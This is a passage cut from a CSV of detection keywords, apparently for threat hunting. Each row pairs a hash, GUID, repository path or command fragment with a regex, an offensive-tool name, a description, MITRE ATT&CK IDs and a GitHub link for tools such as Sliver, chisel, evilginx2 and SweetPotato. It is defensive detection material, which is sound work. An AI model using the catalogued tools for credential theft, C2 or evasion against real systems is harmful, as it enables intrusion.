advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*cce469f76bb65315222426a32f579c4ba820587173b4dffb7f012f5b0bd5a877*",".{0,1000}cce469f76bb65315222426a32f579c4ba820587173b4dffb7f012f5b0bd5a877.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*ccea30c929a2846362b054a4692f6ea16c077b8860080b31245b15e12b27e5fb*",".{0,1000}ccea30c929a2846362b054a4692f6ea16c077b8860080b31245b15e12b27e5fb.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*CCHOST=127.0.0.1*/tmp/c2*",".{0,1000}CCHOST\=127\.0\.0\.1.{0,1000}\/tmp\/c2.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","0","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*cckuailong/reapoc*",".{0,1000}cckuailong\/reapoc.{0,1000}","offensive_tool_keyword","reapoc","OpenSource Poc && Vulnerable-Target Storage Box.","T1552","TA0006","N/A","N/A","Exploitation tools","https://github.com/cckuailong/reapoc","1","1","N/A","N/A","7","659","218","2023-02-06T08:27:09Z","2021-11-28T00:46:27Z" "*CcmExec might not be installed on target*",".{0,1000}CcmExec\smight\snot\sbe\sinstalled\son\starget.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","0","N/A","10","2","122","11","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z" "*CcmExec service not accessible on remote system! :(*",".{0,1000}CcmExec\sservice\snot\saccessible\son\sremote\ssystem!\s\:\(.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","0","N/A","10","2","122","11","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z" "*CCob/BOF.NET*",".{0,1000}CCob\/BOF\.NET.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*CCob/lsarelayx*",".{0,1000}CCob\/lsarelayx.{0,1000}","offensive_tool_keyword","lsarelayx","lsarelayx is system wide NTLM relay tool designed to relay incoming NTLM based authentication to the host it is running on","T1557.001 - T1187 - T1558","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/CCob/lsarelayx","1","1","N/A","10","6","511","62","2023-04-25T23:15:33Z","2021-11-12T18:55:01Z" "*CCob/MirrorDump*",".{0,1000}CCob\/MirrorDump.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","1","N/A","10","3","258","59","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z" "*CCob/SweetPotato*",".{0,1000}CCob\/SweetPotato.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","1","N/A","10","10","1463","206","2024-01-19T15:13:57Z","2020-04-12T17:40:03Z" "*CCob/ThreadlessInject*",".{0,1000}CCob\/ThreadlessInject.{0,1000}","offensive_tool_keyword","ThreadlessInject","Threadless Process Injection using remote function hooking.","T1055.012 - T1055.003 - T1177","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/ThreadlessInject","1","1","N/A","10","7","661","76","2023-02-23T10:23:56Z","2023-02-05T13:50:15Z" "*cd DuckDuckC2*",".{0,1000}cd\s\sDuckDuckC2.{0,1000}","offensive_tool_keyword","DuckDuckC2","A proof-of-concept C2 channel through DuckDuckGo's image proxy service","T1071.001 - T1090.003","TA0011 - TA0042","N/A","N/A","C2","https://github.com/nopcorn/DuckDuckC2","1","0","N/A","10","10","69","7","2023-11-12T10:24:59Z","2023-09-23T20:00:09Z" "*cd ./whereami/*",".{0,1000}cd\s\.\/whereami\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses handwritten shellcode to return the process Environment strings without touching any DLL's.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/whereami","1","0","N/A","10","10","157","28","2023-03-13T15:56:38Z","2021-08-19T22:32:34Z" "*cd ffuf*",".{0,1000}cd\sffuf.{0,1000}","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","N/A","N/A","10","11438","1203","2024-04-07T15:24:38Z","2018-11-08T09:25:49Z" "*cd golang_c2*",".{0,1000}cd\sgolang_c2.{0,1000}","offensive_tool_keyword","golang_c2","C2 written in Go for red teams aka gorfice2k","T1071 - T1021 - T1090","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/m00zh33/golang_c2","1","0","N/A","10","10","6","8","2019-03-18T00:46:41Z","2019-03-19T02:39:59Z" "*cd inceptor*",".{0,1000}cd\sinceptor.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*cd katoolin3*",".{0,1000}cd\skatoolin3.{0,1000}","offensive_tool_keyword","katoolin3","Katoolin3 brings all programs available in Kali Linux to Debian and Ubuntu.","T1203 - T1090 - T1020","TA0006 - TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/s-h-3-l-l/katoolin3","1","0","N/A","N/A","4","336","112","2020-08-05T17:21:00Z","2019-09-05T13:14:46Z" "*cd koadic*",".{0,1000}cd\skoadic.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*cd ligolo*",".{0,1000}cd\sligolo.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","0","N/A","10","10","1643","218","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" "*cd PurplePanda*",".{0,1000}cd\sPurplePanda.{0,1000}","offensive_tool_keyword","PurplePanda","This tool fetches resources from different cloud/saas applications focusing on permissions in order to identify privilege escalation paths and dangerous permissions in the cloud/saas configurations. Note that PurplePanda searches both privileges escalation paths within a platform and across platforms.","T1595 - T1078 - T1583 - T1087 - T1526","TA0003 - TA0004 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/carlospolop/PurplePanda","1","0","N/A","N/A","7","630","79","2024-02-01T15:17:31Z","2022-01-01T12:10:40Z" "*cd PyExfil*",".{0,1000}cd\sPyExfil.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*cd2101e2377fe9da558c198ff1d2311a9eeec08faa767a86ac51fffb50a5565d*",".{0,1000}cd2101e2377fe9da558c198ff1d2311a9eeec08faa767a86ac51fffb50a5565d.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*CD257C0A-9071-42B4-A2FF-180622DBCA96*",".{0,1000}CD257C0A\-9071\-42B4\-A2FF\-180622DBCA96.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*CD3578F6-01B7-48C9-9140-1AFA44B3A7C0*",".{0,1000}CD3578F6\-01B7\-48C9\-9140\-1AFA44B3A7C0.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","669","140","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" "*cd368574698bcb3e3846833badff06b3e0d3799c2f371d029a60403f0f270f5a*",".{0,1000}cd368574698bcb3e3846833badff06b3e0d3799c2f371d029a60403f0f270f5a.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*cd40dbcdae84b1c8606f29342066547069ed5a33*",".{0,1000}cd40dbcdae84b1c8606f29342066547069ed5a33.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","0","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*CD517B47-6CA1-4AC3-BC37-D8A27F2F03A0*",".{0,1000}CD517B47\-6CA1\-4AC3\-BC37\-D8A27F2F03A0.{0,1000}","offensive_tool_keyword","NtlmThief","Extracting NetNTLM without touching lsass.exe","T1558.003 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/MzHmO/NtlmThief","1","0","N/A","10","3","205","30","2023-11-27T14:50:10Z","2023-11-26T08:14:50Z" "*cd8e9d2d24021e2a7ef20793d8b26f3c0baa8eea46e927875b53704761117bdd*",".{0,1000}cd8e9d2d24021e2a7ef20793d8b26f3c0baa8eea46e927875b53704761117bdd.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","0","N/A","7","1","60","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z" "*cd8e9d2d24021e2a7ef20793d8b26f3c0baa8eea46e927875b53704761117bdd*",".{0,1000}cd8e9d2d24021e2a7ef20793d8b26f3c0baa8eea46e927875b53704761117bdd.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","0","N/A","7","1","60","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z" "*cdaee04229c5aefdb806af27910f34d3*",".{0,1000}cdaee04229c5aefdb806af27910f34d3.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*cdb6b0d366c80ef521a59334a58f95ea5b7dbddc6e9f81ff28a11ec44ceba696*",".{0,1000}cdb6b0d366c80ef521a59334a58f95ea5b7dbddc6e9f81ff28a11ec44ceba696.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*cdb93e8cd015790f3895a76168b8ce42f73bc7da4ee4ab08c9ea7ae7fecbd9e3*",".{0,1000}cdb93e8cd015790f3895a76168b8ce42f73bc7da4ee4ab08c9ea7ae7fecbd9e3.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*cdd1184f3b6ee040bb0f668cb15a4691d327009942857bd0c62b11cd0e3d0f50*",".{0,1000}cdd1184f3b6ee040bb0f668cb15a4691d327009942857bd0c62b11cd0e3d0f50.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*cddownloadelevategetprivsinjectpersistportscanpspwdrunassaveshellshutdownsleep*",".{0,1000}cddownloadelevategetprivsinjectpersistportscanpspwdrunassaveshellshutdownsleep.{0,1000}","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","0","N/A","10","10","1049","114","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z" "*cded4541c570c91fd895adeca650b968f20fb68809e59f007a896730d097d8af*",".{0,1000}cded4541c570c91fd895adeca650b968f20fb68809e59f007a896730d097d8af.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*cdimage.kali.org/*",".{0,1000}cdimage\.kali\.org\/.{0,1000}","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*cdn_proxy cloudflare ",".{0,1000}cdn_proxy\scloudflare\s","offensive_tool_keyword","cdn-proxy","cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.","T1100 - T1090 - T1105 - T1133 - T1190","TA0003 - TA0008","","","Defense Evasion","https://github.com/RyanJarv/cdn-proxy","1","0","N/A","N/A","3","225","26","2022-08-25T00:40:25Z","2022-03-07T21:11:07Z" "*cdn_proxy_burp_ext.py*",".{0,1000}cdn_proxy_burp_ext\.py.{0,1000}","offensive_tool_keyword","cdn-proxy","cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.","T1100 - T1090 - T1105 - T1133 - T1190","TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/RyanJarv/cdn-proxy","1","1","N/A","N/A","3","225","26","2022-08-25T00:40:25Z","2022-03-07T21:11:07Z" "*cdn-proxy -*",".{0,1000}cdn\-proxy\s\-.{0,1000}","offensive_tool_keyword","cdn-proxy","cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.","T1100 - T1090 - T1105 - T1133 - T1190","TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/RyanJarv/cdn-proxy","1","0","N/A","N/A","3","225","26","2022-08-25T00:40:25Z","2022-03-07T21:11:07Z" "*cdn-proxy cloudfront *",".{0,1000}cdn\-proxy\scloudfront\s.{0,1000}","offensive_tool_keyword","cdn-proxy","cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.","T1100 - T1090 - T1105 - T1133 - T1190","TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/RyanJarv/cdn-proxy","1","0","N/A","N/A","3","225","26","2022-08-25T00:40:25Z","2022-03-07T21:11:07Z" "*cdn-proxy.git*",".{0,1000}cdn\-proxy\.git.{0,1000}","offensive_tool_keyword","cdn-proxy","cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.","T1100 - T1090 - T1105 - T1133 - T1190","TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/RyanJarv/cdn-proxy","1","1","N/A","N/A","3","225","26","2022-08-25T00:40:25Z","2022-03-07T21:11:07Z" "*cdn-proxy/burp_extension*",".{0,1000}cdn\-proxy\/burp_extension.{0,1000}","offensive_tool_keyword","cdn-proxy","cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.","T1100 - T1090 - T1105 - T1133 - T1190","TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/RyanJarv/cdn-proxy","1","1","N/A","N/A","3","225","26","2022-08-25T00:40:25Z","2022-03-07T21:11:07Z" "*Cdn-Proxy-Host*",".{0,1000}Cdn\-Proxy\-Host.{0,1000}","offensive_tool_keyword","cdn-proxy","cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.","T1100 - T1090 - T1105 - T1133 - T1190","TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/RyanJarv/cdn-proxy","1","1","N/A","N/A","3","225","26","2022-08-25T00:40:25Z","2022-03-07T21:11:07Z" "*Cdn-Proxy-Origin*",".{0,1000}Cdn\-Proxy\-Origin.{0,1000}","offensive_tool_keyword","cdn-proxy","cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.","T1100 - T1090 - T1105 - T1133 - T1190","TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/RyanJarv/cdn-proxy","1","0","N/A","N/A","3","225","26","2022-08-25T00:40:25Z","2022-03-07T21:11:07Z" "*cdn-scanner -*",".{0,1000}cdn\-scanner\s\-.{0,1000}","offensive_tool_keyword","cdn-proxy","cdn-proxy is a set of tools for bypassing IP allow listing intended to restrict origin access to requests originating from shared CDNs.","T1100 - T1090 - T1105 - T1133 - T1190","TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/RyanJarv/cdn-proxy","1","0","N/A","N/A","3","225","26","2022-08-25T00:40:25Z","2022-03-07T21:11:07Z" "*ce189906ea564b5bd6d924791d90b65a3c56d4313d45bdab310145e55a042b6f*",".{0,1000}ce189906ea564b5bd6d924791d90b65a3c56d4313d45bdab310145e55a042b6f.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*CE2307EB-A69E-0EB9-386C-D322223A10A9*",".{0,1000}CE2307EB\-A69E\-0EB9\-386C\-D322223A10A9.{0,1000}","offensive_tool_keyword","SilentCryptoMiner","A Silent (Hidden) Free Crypto Miner Builder","T1496 - T1055 - T1546 - T1082 - T1574","TA0042 - TA0005 - TA0003 - TA0009","N/A","N/A","Cryptomining","https://github.com/UnamSanctam/SilentCryptoMiner","1","0","N/A","9","10","1032","252","2024-04-11T01:25:28Z","2021-11-08T09:03:32Z" "*ce26cac7b0d52a3922cc05a777bb83025430a6a5d31104840a0099d7bd0cb2f4*",".{0,1000}ce26cac7b0d52a3922cc05a777bb83025430a6a5d31104840a0099d7bd0cb2f4.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*ce2e6ef4cc10bd9de836c9de164dd80e043d713ef1ee3425b5bc29f4c7c6e39e*",".{0,1000}ce2e6ef4cc10bd9de836c9de164dd80e043d713ef1ee3425b5bc29f4c7c6e39e.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*ce4255704740f395be5713b049b97814ce537c440b1249850bcb62794dcc7f56*",".{0,1000}ce4255704740f395be5713b049b97814ce537c440b1249850bcb62794dcc7f56.{0,1000}","offensive_tool_keyword","NTLMInjector","restore the user password after a password reset (get the previous hash with DCSync)","T1555 - T1556.003 - T1078 - T1110.003 - T1201 - T1003","TA0001 - TA0003 - TA0004 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/vletoux/NTLMInjector","1","0","N/A","10","2","164","29","2017-06-08T19:01:21Z","2017-06-04T07:25:36Z" "*ce4821d0b380319df17ce6166db15577abd9e77d090d15c83fa67545174f4631*",".{0,1000}ce4821d0b380319df17ce6166db15577abd9e77d090d15c83fa67545174f4631.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*ce514ccbb11797a5e0457b8da2cf4914b753928dcc15d59d4db2d2b5ffcd061b*",".{0,1000}ce514ccbb11797a5e0457b8da2cf4914b753928dcc15d59d4db2d2b5ffcd061b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*CE61ADEE-C032-43EC-ACD8-E4A742F894A3*",".{0,1000}CE61ADEE\-C032\-43EC\-ACD8\-E4A742F894A3.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*ce70b1200ce76360dec6129189daa260779901d01f150868c9f19ec6cea77b36*",".{0,1000}ce70b1200ce76360dec6129189daa260779901d01f150868c9f19ec6cea77b36.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" 